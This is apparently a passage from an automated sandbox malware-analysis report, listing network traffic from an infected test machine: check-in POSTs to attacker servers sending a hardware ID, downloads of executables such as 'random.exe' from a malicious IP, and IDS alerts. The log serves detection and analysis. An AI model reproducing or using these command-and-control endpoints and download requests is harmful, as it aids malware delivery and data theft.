Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 34 42 37 35 38 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B74B75882D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 34 42 37 35 38 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B74B75882D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECFIEGDBKJKFIDHIECGHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 35 31 42 41 30 44 38 46 42 46 37 33 38 39 37 32 35 30 38 33 31 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 47 2d 2d 0d 0a Data Ascii: ------IECFIEGDBKJKFIDHIECGContent-Disposition: form-data; name="hwid"E51BA0D8FBF73897250831------IECFIEGDBKJKFIDHIECGContent-Disposition: form-data; name="build"doma------IECFIEGDBKJKFIDHIECG--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 34 42 37 35 38 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B74B75882D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFCFHDHIIIECBGCAKFIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 46 43 46 48 44 48 49 49 49 45 43 42 47 43 41 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 35 31 42 41 30 44 38 46 42 46 37 33 38 39 37 32 35 30 38 33 31 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 46 48 44 48 49 49 49 45 43 42 47 43 41 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 46 48 44 48 49 49 49 45 43 42 47 43 41 4b 46 49 2d 2d 0d 0a Data Ascii: ------BAFCFHDHIIIECBGCAKFIContent-Disposition: form-data; name="hwid"E51BA0D8FBF73897250831------BAFCFHDHIIIECBGCAKFIContent-Disposition: form-data; name="build"doma------BAFCFHDHIIIECBGCAKFI--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHDHJEBGHJKFIECBGCBHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 35 31 42 41 30 44 38 46 42 46 37 33 38 39 37 32 35 30 38 33 31 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 43 42 2d 2d 0d 0a Data Ascii: ------GDHDHJEBGHJKFIECBGCBContent-Disposition: form-data; name="hwid"E51BA0D8FBF73897250831------GDHDHJEBGHJKFIECBGCBContent-Disposition: form-data; name="build"doma------GDHDHJEBGHJKFIECBGCB--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 34 42 37 35 38 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B74B75882D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 34 42 37 35 38 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B74B75882D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 34 42 37 35 38 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B74B75882D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBFHIEBKJKFHIEBFBAEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 35 31 42 41 30 44 38 46 42 46 37 33 38 39 37 32 35 30 38 33 31 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 2d 2d 0d 0a Data Ascii: ------CFBFHIEBKJKFHIEBFBAEContent-Disposition: form-data; name="hwid"E51BA0D8FBF73897250831------CFBFHIEBKJKFHIEBFBAEContent-Disposition: form-data; name="build"doma------CFBFHIEBKJKFHIEBFBAE--
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDAFBAEBKKEBFIJEBKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 41 46 42 41 45 42 4b 4b 45 42 46 49 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 35 31 42 41 30 44 38 46 42 46 37 33 38 39 37 32 35 30 38 33 31 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 46 42 41 45 42 4b 4b 45 42 46 49 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 46 42 41 45 42 4b 4b 45 42 46 49 4a 45 42 4b 2d 2d 0d 0a Data Ascii: ------EGIDAFBAEBKKEBFIJEBKContent-Disposition: form-data; name="hwid"E51BA0D8FBF73897250831------EGIDAFBAEBKKEBFIJEBKContent-Disposition: form-data; name="build"doma------EGIDAFBAEBKKEBFIJEBK--
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIEBAAKJDHIECAAFHCHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 35 31 42 41 30 44 38 46 42 46 37 33 38 39 37 32 35 30 38 33 31 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 2d 2d 0d 0a Data Ascii: ------IDHIEBAAKJDHIECAAFHCContent-Disposition: form-data; name="hwid"E51BA0D8FBF73897250831------IDHIEBAAKJDHIECAAFHCContent-Disposition: form-data; name="build"doma------IDHIEBAAKJDHIECAAFHC--
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.21.53.8 104.21.53.8
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 185.215.113.37 185.215.113.37
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: AKAMAI-ASUS AKAMAI-ASUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:49772 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49997 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50001 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50011 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50016 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:50016 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:50013 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:50093 -> 185.215.113.16:80
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
